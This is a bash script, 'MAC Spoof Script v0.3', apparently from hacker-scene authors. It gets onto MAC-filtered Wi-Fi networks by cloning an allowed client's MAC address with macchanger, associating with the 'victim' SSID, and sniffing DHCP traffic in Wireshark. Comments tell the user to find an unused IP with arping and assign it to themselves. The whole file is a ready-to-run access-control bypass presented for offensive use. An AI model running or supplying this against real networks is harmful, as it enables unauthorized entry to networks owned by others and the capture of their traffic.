#!/bin/bash
# sets up an interface to spoof a client mac address
# handy for jumping on MAC filtered networks
# coded by thiscodesucks@cybersnipers.com
# some of the code borrowed from the athmacchange.sh script by brad a @ foundstone 
# change 1: commented out the dhcpcd line...can cause conflicts with target network
#           use dhcpcd -T to get dhcp info then use arping to find an open IP instead
# change 2: madwifi-ng has some broken MAC VAP crap, so we are rewriting the whole script
# change 3: added stuff to work with drivers besides atheros

usage(){
  echo
  echo -e "MAC Spoof Script v0.3: Because MAC filtering is for kids"
  echo -e "---------------------------------------------------------------------------"
  echo -e "Usage: $0 <spoofed MAC> <victims SSID> <wireless interface>"
  echo
  echo
  exit 0
}

if [ $# -lt 3 ]; then
  usage
fi

echo
echo -e "          MAC Spoof Script v0.3: Because MAC filtering is for kids"
echo -e "---------------------------------------------------------------------------"
echo

if [ $3 != "wlan0" ]; then
# First we destroy the VAP if it exists
echo
echo -n "Destroying the VAP if it exists"
echo
	for i in $( ls /proc/net/madwifi ); do
	wlanconfig $i destroy 2>&1 /dev/null
	echo -e "\t$i -destroyed"
	done
# Now we take down the interface
echo -e "Taking down interface"
ifconfig wifi0 down

# Now we change our MAC to one that we know is allowed on the network
echo -e "Changing the MAC"
macchanger -m $1 wifi0

# Bringing wifi0 back up
echo -e "Upping wifi0 now"
ifconfig wifi0 up

# Creating a new VAP using the spoofed MAC
echo -e "Creating the new VAP"
wlanconfig ath create wlandev wifi0 wlanmode sta -uniquebssid > /dev/null 2>&1

# Repeating the above commands for non-atheros drivers
else
	echo -e "Setting $3 to Managed mode"
	iwconfig $3 mode managed
	echo -e "Taking down $3"
	ifconfig $3 down

# Now we change the MAC to one we know is allowed on the network

	echo -e "Changing the MAC"
	macchanger -m $1 $3

# Bringing up the interface now

	echo -e "Upping $3 now"
	ifconfig $3 up
fi
# Set our interface up to connect to the Victim's AP
echo -e "Setting our interface to connect to the victim AP"
iwconfig $3 essid $2
ifconfig $3 up

# Sleep a bit to allow the connection to happen
sleep 4

# Start wireshark so we can see those happy packets
echo
echo "starting wireshark to look for dhcp packets then we'll send a dhcp Test packet"
echo "once we finish that, you need to run an arping against the available IP block"
echo "looking for an IP that DOESN'T respond...then assign that IP to your interface"
echo

wireshark -i $3 -k -f "udp port 68" -H -S -l > /dev/null 2>&1 &
sleep 3
# Give wireshark a bit to get going before we send out test packets to the dhcp server

dhcpcd -T $3 > /dev/null 2>&1

exit 0